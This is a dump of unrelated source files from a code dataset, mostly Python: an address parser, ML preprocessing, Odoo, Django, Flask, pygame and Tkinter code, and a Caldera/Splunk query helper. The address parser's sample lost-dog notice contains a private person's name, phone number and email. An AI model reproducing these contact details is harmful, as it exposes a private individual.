[attribute('parts').repeatable()]\n)\n\nFIND_ADDRESS = or_(\n address.METRO.interpretation(\n Address.parts\n ),\n address.STREET_LEVEL_CUSTOM.interpretation(\n Address.parts\n ),\n address.GOROD_LEVEL.interpretation(\n Address.parts\n ),\n address.RAION.interpretation(\n Address.parts\n ),\n address.OTHER_OBJECTS.interpretation(\n Address.parts\n )\n).interpretation(Address)\n \ndef find_address(text):\n pars = Parser(FIND_ADDRESS)\n matc = pars.findall(text)\n facts = [_.span for _ in matc]\n return get_coordinates(' '.join([text[f[0]:f[1]] for f in facts]))\n \ntext = \"\"\"5.12.17 №32214 кобель, Взрослый Черный с белым,хвост пушистый,\nне купированный, больше темного окраса,или просто грязный. \nв районе Можайское шоссе, бегает собака(мальчик),грязный,похож \nна русского спаниеля. 
Заметили его дней 5-6 тому назад,близко не подходит,\nкажется с коричневым ошейником,упитанный.может кто ищет \nНайден(а) в районе Москва ул.Толбухина, ул Говорово 89163894451 \nИрина mussirina@mail.ru\"\"\"\n\nprint(find_address(text))","sub_path":"petsi/find_address_res.py","file_name":"find_address_res.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545192963","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport re\nimport numpy as np\nimport six\nfrom tensorflow.contrib import learn\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.contrib import learn # pylint: disable=g-bad-import-order\n\nTOKENIZER_RE = re.compile(r\"[A-Z]{2,}(?![a-z])|[A-Z][a-z]+(?=[A-Z])|[\\'\\w\\-]+\",\n re.UNICODE)\n\nclass MyVocabularyProcessor(learn.preprocessing.VocabularyProcessor):\n def __init__(self,\n max_seq_len,\n max_word_len,\n min_frequency=0,\n vocabulary=None,\n alphabet_id=None\n ):\n self.max_word_len = max_word_len\n self.alphabet_id = alphabet_id\n sup = super(MyVocabularyProcessor,self)\n sup.__init__(max_seq_len,min_frequency, vocabulary)\n self.max_seq_len = max_seq_len\n self.max_word_len = max_word_len\n self.alphabet_id = alphabet_id\n\n def padSequence(self, raw_document, mode):\n \"\"\"Transform documents to word-id matrix.\n Convert words to ids with vocabulary fitted with fit or the one\n provided in the constructor.\n Args:\n raw_documents: An iterable which yield either str or unicode.\n Yields:\n x: iterable, [n_samples, max_document_length]. Word-id matrix.\n \"\"\"\n length = self.max_seq_len\n for tokens in self._tokenizer(raw_document):\n word_ids = np.zeros(length, np.int64)\n for idx, token in enumerate(tokens):\n if idx >= length:\n break\n word_ids[idx] = self.vocabulary_.get(token)\n yield tokens, word_ids\n\n def padChar(self, raw_document):\n for tokens in self._tokenizer(raw_document):\n char_ids = []\n for i in range(self.max_seq_len):\n char_ids.append(np.zeros(self.max_word_len, np.int64))\n seq_len = len(tokens)\n for i in range(min(seq_len, self.max_seq_len)):\n word_len = len(tokens[i])\n for j in range(min(word_len, self.max_word_len)):\n if tokens[i][j] not in self.alphabet_id.keys():\n char_ids[i][j] = 0\n else:\n char_ids[i][j] = self.alphabet_id[tokens[i][j]]\n yield char_ids\n","sub_path":"program/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600251245","text":"from odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\n\nclass UpdateCurrencyRate(models.TransientModel):\n _name = \"res.currency.update.wiz\"\n\n date_time = fields.Datetime(\"Date\", default=fields.Datetime.now, required=1)\n currency_id = fields.Many2one(\"res.currency\", \"Currency\", required=1)\n rate_symbol = fields.Char(related=\"currency_id.symbol\", string=\"Symbol\")\n currency_unit_label = fields.Char(related=\"currency_id.currency_unit_label\", string=\"Currency Unit\")\n last_rate = fields.Float(\"Last Rate\", digits=(12, 6), compute=\"_get_last_currency_rate\")\n new_rate = fields.Float(\"New Rate\", digits=(12, 6), required=1)\n\n @api.constrains('new_rate')\n def check_new_rate(self):\n for rec in self:\n if rec.new_rate <= 0.00:\n raise ValidationError(\"New rate must be greater than zero.\")\n if rec.new_rate == rec.last_rate:\n raise ValidationError(\"Please set 
a new rate!\")\n\n\n    @api.depends('currency_id')\n    def _get_last_currency_rate(self):\n        if self.currency_id:\n            rate_ids = self.currency_id.rate_ids\n            if rate_ids:\n                self.last_rate = (1 / rate_ids[0].rate)\n\n    @api.multi\n    def apply_new_currency_rate(self):\n        if self.currency_id:\n            self.env['res.currency.rate'].create({'name': self.date_time,\n                                                  'currency_id': self.currency_id.id,\n                                                  'rate': 1 / self.new_rate,\n                                                  'company_id': self.env.user.company_id.id,\n                                                  })","sub_path":"update_currency_rate/wizard/update_currency_rate.py","file_name":"update_currency_rate.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"405596360","text":"from math import pi\ndef cm(r):\n    cm=(r*2)*pi\n    return round(cm,2)\ndef cm2(r):\n    cm2=r**2*pi\n    return round(cm2,2)\nr=float(input('Enter the radius: '))\ncm=cm(r)\ncm2=cm2(r)\nprint('The circumference of a circle with radius ',r,' is ',cm,sep='')\nprint('The area of a circle with radius ',r,' is ',cm2,sep='')","sub_path":"9-9.py","file_name":"9-9.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"325294310","text":"import re\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import RegexValidator, URLValidator\nfrom pyld import jsonld\n\n\nclass DataURIValidator(RegexValidator):\n    regex = re.compile(\n        r'^data:'  # required scheme\n        r'(\\w+\\/\\w+)?'  # optional media type\n        r'(;charset=[\\w-]+)?'  # optional charset\n        r'(;base64)?'  # optional base64\n        r',(.+)'  # data\n    )\n\n    def __call__(self, *args, **kwargs):\n        super(DataURIValidator, self).__call__(*args, **kwargs)\n\n\nclass URLOrDataURIValidator(object):\n\n    def __init__(self, *args, **kwargs):\n        self.data_uri_validator = DataURIValidator(*args, **kwargs)\n        self.url_validator = URLValidator(*args, **kwargs)\n\n    def __call__(self, value):\n        try:\n            self.data_uri_validator(value)\n        except ValidationError as e:\n            self.url_validator(value)\n\n\nclass LDTypeValidator(object):\n    message = 'Type does not match.'\n\n    def __init__(self, type_name=None, message=None):\n        self.type_name = type_name\n        if message is not None:\n            self.message = message\n\n    def __call__(self, value):\n        if isinstance(value, basestring):\n            if self.type_name != value:\n                raise ValidationError(message=self.message)\n        else:\n            if self.type_name not in value:\n                raise ValidationError(message=self.message)\n\n\nclass JsonLdValidator(object):\n    message = 'Invalid JSON LD document: {}'\n\n    def __init__(self, **kwargs):\n        super(JsonLdValidator, self).__init__()\n        self.document_loader = kwargs.get('document_loader')\n\n    def __call__(self, value, **kwargs):\n        options = {}\n\n        if self.document_loader:\n            options['documentLoader'] = self.document_loader\n\n        context = value.get('@context', None)\n        if context is None:\n            raise ValidationError(message=self.message.format('@context is missing'))\n        try:\n            expanded = jsonld.expand(value, options)\n        except Exception as e:\n            raise ValidationError(message=self.message.format('error during expansion: {}'.format(e.message)))\n\n        try:\n            compacted = jsonld.compact(expanded, context, options)\n        except Exception as e:\n            raise ValidationError(message=self.message.format('error during compaction: {}'.format(e.message)))\n","sub_path":"badgecheck/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"509110811","text":"from .placeholder import 
Placeholder\n\n\nclass option(Placeholder):\n\n # Public\n\n def __init__(self, placeholders, options, name, *, prefix=['-', '--']):\n self.__placeholders = placeholders\n self.__options = options\n self.__name = name\n self.__prefix = prefix\n\n def __call__(self):\n argv = []\n value = self.__options.pop(self.__name)\n if value is not False:\n argv += self.__translate_name(self.__name, prefix=self.__prefix)\n if value is not True:\n argv += self.__translate_value(value)\n return argv\n\n # Private\n\n def __translate_name(self, name, *, prefix):\n argv = []\n name = name.replace('_', '-')\n try:\n name = prefix + name\n except TypeError:\n if len(name) == 1:\n name = prefix[0] + name\n else:\n name = prefix[1] + name\n argv.append(name)\n return argv\n\n def __translate_value(self, value):\n argv = []\n if not isinstance(value, list):\n value = [value]\n for item in value:\n item = str(item)\n argv.append(item)\n return argv\n","sub_path":"run_command/placeholder/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488653640","text":"#From codereview.stackexchange.com \ndef partitions(set_):\n if not set_:\n yield []\n return\n for i in range(2**len(set_)//2):\n parts = [set(), set()]\n for item in set_:\n parts[i&1].add(item)\n i >>= 1\n for b in partitions(parts[1]):\n yield [parts[0]]+b\n\n\n# This is a helper function that will fetch all of the available \n# partitions for you to use for your brute force algorithm.\ndef get_partitions(set_):\n for partition in partitions(set_):\n yield [list(elt) for elt in partition]\n\n### Uncomment the following code and run this file\n### to see what get_partitions does if you want to visualize it:\n\n#==============================================================================\n# for item in (get_partitions(['a','a','b'])):\n# print(item)\n#==============================================================================\n \ndef brute_force_cow_transport(cows, limit):\n listPart = []\n for partition in get_partitions(cows.keys()):\n for part in partition:\n partTotal = 0\n for word in part:\n partTotal += cows[word]\n if partTotal > limit:\n break\n else:\n listPart.append(partition)\n min = len(cows), 0\n for i in listPart:\n if len(i) <= min[0]:\n min = len(i), i\n return min[1]\n \nprint(brute_force_cow_transport({\"Jesse\": 6, \"Maybel\": 3, \"Callie\": 2, \"Maggie\": 5}, 9))\nprint(brute_force_cow_transport({'Miss Bella': 25, 'Horns': 25, 'Milkshake': 40, 'MooMoo': 50, 'Lotus': 40, 'Boo': 20}, 100))","sub_path":"study/EdX MIT 6.00.2x/pset1/ps1_partition.py","file_name":"ps1_partition.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"469766382","text":"# pyright: reportMissingImports=false\nimport tkinter as tk\nimport configs.constants as constants\n\n# Field class\nclass Number(tk.Label):\n def __init__(self, parent, *args, **kwargs):\n tk.Label.__init__(\n self,\n parent,\n fg=constants.SCREEN_LABEL,\n bg=constants.SCREEN_BG,\n font=constants.BASKET_FONT,\n *args,\n **kwargs\n )\n\nclass Display(tk.Frame):\n def __init__(self, parent, c):\n tk.Frame.__init__(self, parent, bg=\"#373C40\", padx=8, pady=8)\n # Screen shadow\n tk.Frame(self, bg=\"#8A9986\", height=5).pack(fill=\"x\")\n\n # Basket screen numbers\n self.basketFrame = tk.Frame(self, bg=\"#A6B8A2\")\n self.basketFrame.pack(fill=\"x\")\n 
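# --- Added illustrative sketch (not one of the original dataset records). ---
# The ps1_partition.py record above documents partitions()/get_partitions()
# only through a commented-out visualization loop. A minimal, runnable usage
# sketch, assuming that module sits on the import path (importing it also
# runs its module-level example prints):
from ps1_partition import get_partitions

for partition in get_partitions(['a', 'b', 'c']):
    # Each yielded partition is a list of groups (lists) that together cover
    # every input item exactly once, e.g. [['a', 'b', 'c']] or [['b', 'c'], ['a']].
    print(partition)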
Number(self.basketFrame, text=\"Cart:\").pack(side=\"left\", anchor=\"w\", padx=(4, 0))\n Number(self.basketFrame, textvariable=c.cart).pack(side=\"left\", anchor=\"e\")\n\n Number(self.basketFrame, textvariable=c.subtotal).pack(side=\"right\", anchor=\"e\", padx=(0, 4))\n Number(self.basketFrame, text=\"Subtotal: $\").pack(side=\"right\", anchor=\"w\")\n\n # Main screen numbers\n self.indicator = tk.Label(\n self,\n fg=constants.SCREEN_LABEL,\n bg=constants.SCREEN_BG,\n font=constants.SCREEN_FONT,\n textvariable=c.screenMessage,\n justify=\"center\",\n height=4, width=14,\n border=4\n )\n self.indicator.pack(fill=\"x\")\n","sub_path":"components/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"356224988","text":"import copy\nimport logging\n\nimport numpy as np\nfrom autoarray.dataset import imaging as im\nfrom autocti.structures import arrays\n\nlogger = logging.getLogger(__name__)\n\n\nclass Imaging(im.AbstractImaging):\n def __init__(self, image, noise_map, name=None):\n \"\"\"A collection of 2D imaging dataset(an image, noise-map, psf, etc.)\n\n Parameters\n ----------\n image : aa.Array\n The array of the image data, in units of electrons per second.\n noise_map : NoiseMap | float | ndarray\n An array describing the RMS standard deviation error in each pixel, preferably in units of electrons per\n second.\n background_noise_map : NoiseMap\n An array describing the RMS standard deviation error in each pixel due to the background sky noise_map,\n preferably in units of electrons per second.\n poisson_noise_map : NoiseMap\n An array describing the RMS standard deviation error in each pixel due to the Poisson counts of the source,\n preferably in units of electrons per second.\n exposure_time_map : aa.Array\n An array describing the effective exposure time in each imaging pixel.\n background_sky_map : aa.Scaled\n An array describing the background sky.\n \"\"\"\n\n super(Imaging, self).__init__(image=image, noise_map=noise_map, name=name)\n\n @classmethod\n def from_fits(\n cls,\n image_path,\n pixel_scales,\n image_hdu=0,\n noise_map_path=None,\n noise_map_hdu=0,\n name=None,\n ):\n \"\"\"Factory for loading the imaging data_type from .fits files, as well as computing properties like the noise-map,\n exposure-time map, etc. from the imaging-data.\n\n This factory also includes a number of routines for converting the imaging-data from unit_label not supported by PyAutoLens \\\n (e.g. adus, electrons) to electrons per second.\n\n Parameters\n ----------\n name\n image_path : str\n The path to the image .fits file containing the image (e.g. '/path/to/image.fits')\n pixel_scales : float\n The size of each pixel in arc seconds.\n image_hdu : int\n The hdu the image is contained in the .fits file specified by *image_path*.\n noise_map_path : str\n The path to the noise_map .fits file containing the noise_map (e.g. 
'/path/to/noise_map.fits')\n noise_map_hdu : int\n The hdu the noise_map is contained in the .fits file specified by *noise_map_path*.\n \"\"\"\n\n image = arrays.Array.from_fits(\n file_path=image_path, hdu=image_hdu, pixel_scales=pixel_scales\n )\n\n noise_map = arrays.Array.from_fits(\n file_path=noise_map_path, hdu=noise_map_hdu, pixel_scales=pixel_scales\n )\n\n return Imaging(image=image, noise_map=noise_map, name=name)\n\n def output_to_fits(self, image_path, noise_map_path=None, overwrite=False):\n\n self.image.output_to_fits(file_path=image_path, overwrite=overwrite)\n\n if self.noise_map is not None and noise_map_path is not None:\n self.noise_map.output_to_fits(file_path=noise_map_path, overwrite=overwrite)\n\n\nclass MaskedImaging(im.MaskedImaging):\n def __init__(self, imaging, mask):\n \"\"\"\n The lens dataset is the collection of data_type (image, noise-map, PSF), a mask, grid, convolver \\\n and other utilities that are used for modeling and fitting an image of a strong lens.\n\n Whilst the image, noise-map, etc. are loaded in 2D, the lens dataset creates reduced 1D arrays of each \\\n for lens calculations.\n\n Parameters\n ----------\n imaging: im.Imaging\n The imaging data_type all in 2D (the image, noise-map, PSF, etc.)\n mask: msk.Mask2D\n The 2D mask that is applied to the image.\n \"\"\"\n\n super().__init__(imaging=imaging, mask=mask)\n\n self.image = imaging.image * np.invert(mask)\n self.noise_map = imaging.noise_map * np.invert(mask)\n","sub_path":"autocti/dataset/imaging.py","file_name":"imaging.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"571557917","text":"import collections \nimport csv\n\n\nif __name__ == \"__main__\":\n with open(\"names.csv\") as file:\n shared_firstnames = collections.defaultdict(list)\n shared_lastnames = collections.defaultdict(list)\n reader = csv.DictReader(file)\n for line in reader:\n shared_firstnames[line[\"First\"]].append(line[\"Last\"])\n shared_lastnames[line[\"Last\"]].append(line[\"First\"])\n\n print(\"** Shared First Names! **\")\n for key, value in shared_firstnames.items():\n print(f\"{key} ({len(value)}): {value}\")\n\n\n print(\"** Shared Last Names! 
**\")\n for key, value in shared_lastnames.items():\n print(f\"{key} ({len(value)}): {value}\")\n","sub_path":"Parseltongue_04/00_phonebook.py","file_name":"00_phonebook.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"613946340","text":"import math\r\nimport random\r\n\r\ndef sek_paa_banen(a,b,c):\r\n t = c*60\r\n t_s = t/a\r\n bt = t - (t_s*b)\r\n if bt - int(bt) < 0.5:\r\n sek = math.floor(bt)\r\n else:\r\n sek = math.ceil(bt)\r\n return sek\r\n\r\n\r\ndef minutt_sekunder(sekunder):\r\n m = sekunder // 60\r\n s = sekunder % 60\r\n if s < 10:\r\n s = '0' + str(s)\r\n else:\r\n s = str(s)\r\n return str(m)+':'+s\r\n\r\ndef les_inn_frafall():\r\n spillere = []\r\n avslutt = False\r\n while not avslutt:\r\n x = str(input('Spiller som har meldt frafall: '))\r\n if x == '':\r\n avslutt = True\r\n else:\r\n spillere.append(x)\r\n return spillere\r\n\r\ndef finn_tilgjengelige(alle,forfall):\r\n tilgj = [] + alle\r\n for navn in forfall:\r\n tilgj.remove(navn)\r\n return tilgj\r\n\r\n\r\ndef laginndeling(spillere,sp_pr_lag):\r\n ant_lag = len(spillere)//sp_pr_lag\r\n kopi =[]+spillere\r\n lagoppsett = [[] for i in range(ant_lag)]\r\n lag = 0\r\n while kopi != []:\r\n navn = random.choice(kopi)\r\n kopi.remove(navn)\r\n lagoppsett[lag].append(navn)\r\n lag = (lag+1)%ant_lag\r\n return lagoppsett\r\n\r\n\r\ndef main():\r\n print('Skriv navn, eller kun Enter(tom tekst) for å avslutte')\r\n\r\n\r\nsp = ['Ada', 'Bo', 'Eli', 'Isa', 'Cindy', 'Henrik', 'Ine', 'Jo', 'Kim',\r\n'Lucas', 'My', 'Noor', 'Ola', 'Pia']\r\n\r\n\r\n","sub_path":"ITGK_eksamensforberedelse/kont2016/oppg3.py","file_name":"oppg3.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"473797583","text":"import json\nimport os\nimport caldera.db\nfrom splunk.cmd import splunk_red_search_op, splunk_red_search_ability\n\nfrom caldera.db import get_ops, core_db, get_ability_info, get_unique_id\n\ndef op_info():\n com_ops = \"\"\n while(com_ops != \"x\"):\n ops = get_ops()\n print(ops)\n com_ops = input(\"(ops)->\")\n if(com_ops in ops):\n op_num = ops[com_ops]\n core_db.execute('SELECT * FROM core_chain WHERE op_id=?', (op_num,))\n ret = core_db.fetchall()\n\n print(\"id ability att&ck_id name start end\")\n for x in range(0, len(ret)):\n print(str(ret[x][0]).ljust(2), end=\" \")\n info1,info2,info3 = get_ability_info(ret[x][3])\n print(str(ret[x][3]).ljust(3), end=\" \")\n print(info2.ljust(6), end=\" \")\n print(info3.ljust(20), end=\" \")\n print(ret[x][10], end=\" \")\n print(ret[x][11])\n com_abil = input(\"(ops/\" + com_ops + \")->\")\n for y in range(0, len(ret)):\n if(int(com_abil) == ret[y][3]):\n splunk_red_search_ability(int(com_abil))\n break\n\ndef prompt():\n com = \"\"\n while(com != 'x'):\n os.system('cls')\n print(\"splunk analytics for caldera\")\n print(\"caldera path: [\" + caldera.db.caldera_path + \"]\")\n com = input(\"->\")\n if(com=='ops'):\n op_info()\n\n\n\n","sub_path":"utils/prompt.py","file_name":"prompt.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312817447","text":"import pandas as pd\r\nimport numpy as np\r\nimport glob\r\n\r\nall_data = pd.DataFrame()\r\nfor f in glob.glob(\"C:\\\\Users\\\\amarsh04\\\\Desktop\\\\Industry Updates\\\\Paid Search\\\\Google\\\\CVRs\\\\*.xlsx\"):\r\n df = pd.read_excel(f)\r\n 
df.rename(columns={ df.columns[0]: "advertising_channel_type", df.columns[1]: "advertising_channel_sub_type", df.columns[2]: "account_id", df.columns[3]: "account_name", df.columns[4]: "campaign_name", df.columns[5]: "device_type", df.columns[6]: "year", df.columns[7]: "month", df.columns[8]: "conversions"}, inplace=True)\r\n    all_data = all_data.append(df,ignore_index=True)\r\n\r\n# drop_duplicates() is not in-place, so keep the de-duplicated frame\r\nall_data = all_data.drop_duplicates()\r\n\r\nall_data.insert(0, "media_provider_name", "google")\r\n#all_data.rename(columns={"account_name": "account_name"})\r\n#all_data.rename(columns={"device": "device_type"})\r\n\r\nall_data.to_csv('C:\\\\Users\\\\amarsh04\\\\Desktop\\\\Industry Updates\\\\full_googleads_cvrs.csv', sep=',', index=False)","sub_path":"concat_googleads_cvrs.py","file_name":"concat_googleads_cvrs.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"234751004","text":"import pygame\r\n\r\n\r\nclass animation():\r\n\r\n    def setStartPoint(self):\r\n\r\n        current_point = [None, None]\r\n\r\n        if self.direction == 'top':\r\n            current_point[0] = self.destination[0]\r\n            current_point[1] = 0\r\n\r\n        if self.direction == 'bottom':\r\n            current_point[0] = self.destination[0]\r\n            current_point[1] = 0\r\n\r\n        if self.direction == 'left':\r\n            current_point[0] = self.destination[0]\r\n            current_point[1] = 0\r\n\r\n        if self.direction == 'right':\r\n            current_point[0] = self.destination[0]\r\n            current_point[1] = 0\r\n\r\n        return current_point\r\n\r\n\r\n    def __init__(self, surface, destination, direction = None, speed = None):\r\n\r\n        self.surface = surface\r\n        self.destination = destination\r\n\r\n        self.speed = speed\r\n\r\n        if direction == None:\r\n            self.current_point = []\r\n            self.done = True\r\n        else:\r\n            self.direction = direction\r\n            self.current_point = self.setStartPoint()\r\n            self.done = False\r\n\r\n\r\n    def getNextPoint(self):\r\n\r\n        if self.direction == 'top':\r\n            self.current_point[0] = self.destination[0]\r\n            self.current_point[1] = self.current_point[1] + self.speed\r\n            if self.current_point[1] >= self.destination[1]:\r\n                self.current_point[1] = self.destination[1]\r\n\r\n        if self.direction == 'bottom':\r\n            self.current_point[0] = self.destination[0]\r\n            self.current_point[1] = 0\r\n\r\n        if self.direction == 'left':\r\n            self.current_point[0] = self.destination[0]\r\n            self.current_point[1] = 0\r\n\r\n        if self.direction == 'right':\r\n            self.current_point[0] = self.destination[0]\r\n            self.current_point[1] = 0\r\n\r\n        return self.current_point\r\n\r\n    def getSize(self):\r\n\r\n        return self.surface.get_size()\r\n\r\n\r\n\r\nclass Button():\r\n\r\n    def setText(self, text):\r\n\r\n        self.text = text\r\n        self.txt_surf = game_font.render(self.text, True, black)\r\n\r\n        txt_width, txt_height = self.txt_surf.get_size()\r\n        mid_point_x = self.button_location[0] + (self.button_size[0]/2)\r\n        mid_point_y = self.button_location[1] + (self.button_size[1]/2)\r\n\r\n        self.txt_loc = (mid_point_x - (txt_width/2), mid_point_y - (txt_height/2))\r\n\r\n\r\n    def __init__(self, colour, button_location, button_size = None):\r\n\r\n        self.button_location = button_location\r\n        self.colour = colour\r\n\r\n        if button_size != None :\r\n            self.button_size = button_size\r\n        else:\r\n            self.button_size = [50, 27]\r\n\r\n        self.light_colour = (colour[0] - 25, colour[1] - 25, colour[2] - 25)\r\n\r\n\r\n    def draw(self):\r\n\r\n        self.rect = pygame.draw.rect(gameDisplay, self.colour, (self.button_location[0],
self.button_location[1], self.button_size[0], self.button_size[1]), 2)\r\n \r\n\r\n def hover(self):\r\n\r\n pygame.draw.rect(gameDisplay, self.light_colour, (self.button_location[0], self.button_location[1], self.button_size[0], self.button_size[1]), 2)\r\n\r\n\r\n\r\ndef play_music(file_name):\r\n\r\n music = pygame.mixer.music\r\n\r\n music.load(file_name)\r\n music.play(-1)\r\n music.set_volume(0.25)\r\n\r\n\r\ndef animate(animation_obj):\r\n\r\n if not animation_obj.done:\r\n gameDisplay.blit(animation_obj.surface, animation_obj.current_point)\r\n current_point = animation_obj.getNextPoint()\r\n if animation_obj.destination <= current_point:\r\n animation_obj.done = True\r\n else:\r\n gameDisplay.blit(animation_obj.surface, animation_obj.destination)\r\n \r\n return animation_obj.done\r\n\r\n\r\ndef take_input():\r\n pass\r\n \r\n\r\n\r\ndef game_intro():\r\n\r\n## play_music('music/intro_music.mp3')\r\n\r\n welcome_surf = pygame.image.load('images/welcome.png')\r\n welcome_obj = animation(welcome_surf, [130, 75], 'top', 5)\r\n\r\n start_button = Button(grey, (335, 450), (100, 50))\r\n start_button.setText('Start')\r\n\r\n intro = True\r\n\r\n while intro:\r\n\t\r\n gameDisplay.fill(white)\r\n\r\n if animate(welcome_obj):\r\n\r\n start_button.draw()\r\n gameDisplay.blit(start_button.txt_surf, start_button.txt_loc)\r\n\r\n for event in pygame.event.get():\r\n print(event)\r\n\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n exit()\r\n\r\n mouse_position = pygame.mouse.get_pos()\r\n if event.type == pygame.MOUSEMOTION:\r\n if start_button.rect.collidepoint(mouse_position):\r\n start_button.hover()\r\n \r\n if event.type == pygame.MOUSEBUTTONUP:\r\n if start_button.rect.collidepoint(mouse_position):\r\n intro = False\r\n \r\n pygame.display.update()\r\n clock.tick(30)\r\n\t\t\r\n return True\r\n\r\n\r\ndef start_game():\r\n\r\n pygame.mixer.fadeout(2000)\r\n\r\n## play_music('music/game_music.mp3')\r\n\r\n ok_text_surf = game_font.render('OK!', True, black)\r\n ok_text = animation(ok_text_surf, [375, 50], 'top', 3)\r\n\t\r\n set_text_surf = game_font.render('Set the length of the word ', True, black)\r\n set_text = animation(set_text_surf, [225,130])\r\n\r\n button_location = set_text.getSize()\r\n input_button = Button(grey, (set_text.destination[0] + button_location[0], set_text.destination[1]))\r\n\r\n started = False\r\n\r\n while not started:\r\n\r\n gameDisplay.fill(white)\r\n\r\n if animate(ok_text):\r\n animate(set_text)\r\n input_button.draw()\r\n\r\n for event in pygame.event.get():\r\n print(event)\r\n\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n exit()\r\n\r\n mouse_position = pygame.mouse.get_pos()\r\n if event.type == pygame.MOUSEMOTION:\r\n if input_button.rect.collidepoint(mouse_position):\r\n input_button.hover() \r\n \r\n if event.type == pygame.MOUSEBUTTONUP:\r\n if input_button.rect.collidepoint(mouse_position):\r\n take_input()\r\n started = True\r\n \r\n\t\t\t\r\n pygame.display.update()\r\n clock.tick(30)\r\n\t\r\n return True\r\n\r\n\r\npygame.init()\r\n\r\ndisplay_width = 800\r\ndisplay_height = 600\r\n\r\ngameDisplay = pygame.display.set_mode((display_width, display_height))\r\npygame.display.set_caption('WordPuzzle')\r\n\r\nblack = (75,75,75)\r\nwhite = (255,255,255)\r\ngrey = (150,150,200)\r\nlight_grey = (75,75,100)\r\n\r\ngame_font = pygame.font.Font(None, 35)\r\nclock = 
pygame.time.Clock()\r\n\r\ngame_intro()\r\nstart_game()\r\n#play()\r\n","sub_path":"Final_1.py","file_name":"Final_1.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"260232025","text":"import csv\nimport matplotlib.pyplot as plt\nimport numpy as np\n\npath = \"./graph1_accuracy.csv\"\n\nx_axis = []\ny_axis = []\n\n# csv.reader expects a text-mode file object in Python 3 (opening with \"rb\" fails)\nwith open(path, newline='') as file:\n    reader = csv.reader(file)\n    for row in reader:\n        x_axis.append(row[1])\n        y_axis.append(row[2])\n\nplt.plot(x_axis, y_axis)\n# the default MaxNLocator takes nbins; numticks is not a valid keyword here\nplt.locator_params(nbins=4)\nplt.show()\n","sub_path":"Helper Scripts/CNN Graph Scripts/graph1.py","file_name":"graph1.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"273372097","text":"from flask import Blueprint, redirect, request, url_for, render_template\nfrom ..representations.subscription import CreateSubscriptionRequest\nfrom .helper import verify_auth\n\n\ndef construct_subscription_blueprint(user_client):\n    subscription_crud = Blueprint('subscription', __name__)\n\n    @subscription_crud.route('/create', methods=['POST'])\n    def create():\n        # check user login\n        (claims, error_message) = verify_auth(request.cookies.get('funtech_token'))\n        if claims is None or error_message is not None:\n            return redirect(url_for('auth.login'))\n\n        if request.method == 'POST':\n            data = request.form.to_dict(flat=True)\n            user_id = data['user_id']\n            park_id = data['park_id']\n            create_subscription_request = CreateSubscriptionRequest(user_id=user_id, park_id=park_id)\n            user_client.create_subscription(create_subscription_request)\n            return redirect(url_for('park.view_posts', id=str(park_id)))\n\n    @subscription_crud.route('/delete', methods=['POST'])\n    def delete():\n        # check user login\n        (claims, error_message) = verify_auth(request.cookies.get('funtech_token'))\n        if claims is None or error_message is not None:\n            return redirect(url_for('auth.login'))\n        user = user_client.get_by_email_id(claims['email'])\n\n        if request.method == 'POST':\n            data = request.form.to_dict(flat=True)\n            subscription_id = data['subscription_id']\n            # check if the subscription belongs to user.
Can be done on backend also\n error = user_client.delete_subscription(subscription_id)\n if error is None:\n return redirect(url_for('user.view_subscriptions', id=str(user.id)))\n else:\n return render_template('error.html', user=user)\n\n return subscription_crud\n","sub_path":"ui/app/amusepark/routes/subscription_route.py","file_name":"subscription_route.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"213886498","text":"\"\"\"Contains functions for managing a database for workflow and task information.\"\"\"\n\nimport sqlite3\nfrom sqlite3 import Error\nfrom beeflow.common.config_driver import BeeConfig as bc\nbc.init()\n\n\ndef connect_db(module, db_path):\n \"\"\"Return a DB object.\"\"\"\n db = module.open_db(db_path)\n return db\n\n\ndef create_connection(db_file):\n \"\"\"Create a new connection with the workflow database.\"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as error:\n print(error)\n return conn\n\n\ndef create_table(db_file, stmt):\n \"\"\"Create a new table in the database.\"\"\"\n with create_connection(db_file) as conn:\n try:\n 